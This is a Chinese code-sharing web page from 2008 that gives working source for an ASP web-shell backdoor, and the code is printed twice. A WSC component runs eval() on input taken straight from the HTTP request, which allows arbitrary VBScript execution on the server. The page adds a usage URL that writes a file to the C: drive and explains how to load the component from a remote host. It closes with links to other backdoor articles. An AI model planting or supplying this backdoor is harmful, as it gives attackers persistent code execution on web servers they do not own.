利用wsc制作的一個(gè)asp后門(mén)
更新時(shí)間:2008年12月12日 14:07:55 作者:
ScriptCodingInfo.wsc代碼如下,該文件可以改成任意后綴
<?xml version="1.0" encoding="gb2312" standalone="yes"?>
<?component error="true" debug="true"?>
<package>
<component id="haiyangtop">
<public>
<method name="lcx"><parameter name="b"/></method>
</public>
<script language="VBScript"><![CDATA[
sub lcx(b)
eval(b)
end sub
]]>
</script>
</component>
</package>
backdoor.asp內(nèi)容如下:
<%
b=request("a")
Set fs = GetObject("script:d:/web/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx(b)
%>
調(diào)用方法如下:http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")
注意這里的a=只能是vbs的代碼,不可以接受像response、rquest之類(lèi)的asp的東東。
如果是2000服務(wù)器可以在backdoor.asp遠(yuǎn)程調(diào)用ScriptCodingInfo.wsc,像
Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop"),2003服務(wù)器中不可以。
算一個(gè)思路,雞肋,誰(shuí)有更好的辦法完善,能夠直接調(diào)用cs的asp木馬的c端就好了。
<?component error="true" debug="true"?>
<package>
<component id="haiyangtop">
<public>
<method name="lcx"><parameter name="b"/></method>
</public>
<script language="VBScript"><![CDATA[
sub lcx(b)
eval(b)
end sub
]]>
</script>
</component>
</package>
backdoor.asp內(nèi)容如下:
<%
b=request("a")
Set fs = GetObject("script:d:/web/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx(b)
%>
調(diào)用方法如下:http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")
注意這里的a=只能是vbs的代碼,不可以接受像response、rquest之類(lèi)的asp的東東。
如果是2000服務(wù)器可以在backdoor.asp遠(yuǎn)程調(diào)用ScriptCodingInfo.wsc,像
Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop"),2003服務(wù)器中不可以。
算一個(gè)思路,雞肋,誰(shuí)有更好的辦法完善,能夠直接調(diào)用cs的asp木馬的c端就好了。
您可能感興趣的文章:
- Linux下查找后門(mén)程序 CentOS 查后門(mén)程序的shell腳本
- PHP隱形一句話后門(mén),和ThinkPHP框架加密碼程序(base64_decode)
- 變態(tài)入侵之有史以來(lái)最酷的Windows后門(mén)sethc.exe
- VBS+MSWinsock打造靈巧UDP后門(mén)的相關(guān)資料
- VC++植物大戰(zhàn)僵尸中文版修改器實(shí)現(xiàn)代碼
- C++動(dòng)態(tài)規(guī)劃之最長(zhǎng)公子序列實(shí)例
- C++動(dòng)態(tài)規(guī)劃之背包問(wèn)題解決方法
- C++實(shí)現(xiàn)基于控制臺(tái)界面的吃豆子游戲
- C++映像劫持后門(mén)實(shí)例分析
相關(guān)文章
vbs 搜索代理地址實(shí)現(xiàn)代碼[小偷程序]
將下面的代碼,直接保存為getproxy.vbs即可。2009-10-10vbs實(shí)現(xiàn)右鍵菜單中添加CMD HERE
cmdhere安裝,使你在任何目錄下直接進(jìn)入改目錄的CMD狀態(tài),需要的朋友可以參考下2008-05-05修復(fù)Windows上面的WScript的腳本(.vbs)不能執(zhí)行了
修復(fù)Windows上面的WScript的腳本(.vbs)不能執(zhí)行了...2007-03-03IE瀏覽器增加“復(fù)制圖像地址”的右鍵菜單的vbs代碼
在網(wǎng)絡(luò)上共享照片,常需要復(fù)制上傳到某站點(diǎn)的照片的鏈接地址,部分瀏覽器提供了比較快捷的右鍵菜單來(lái)復(fù)制該地址,如Maxthon、Firefox等2008-12-12Springboot Thymeleaf數(shù)據(jù)迭代實(shí)現(xiàn)過(guò)程
這篇文章主要介紹了Springboot Thymeleaf數(shù)據(jù)迭代實(shí)現(xiàn)過(guò)程,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友可以參考下2007-12-12使用腳本調(diào)用系統(tǒng)的關(guān)機(jī)對(duì)話框?qū)崿F(xiàn)代碼
以前有介紹如何使用命令行調(diào)用系統(tǒng)的關(guān)機(jī)對(duì)話框rundll32.exe shell32.dll #60,但是,上述方法會(huì)存在一問(wèn)題,XP下無(wú)法正常使用該方法進(jìn)行關(guān)機(jī)2012-05-05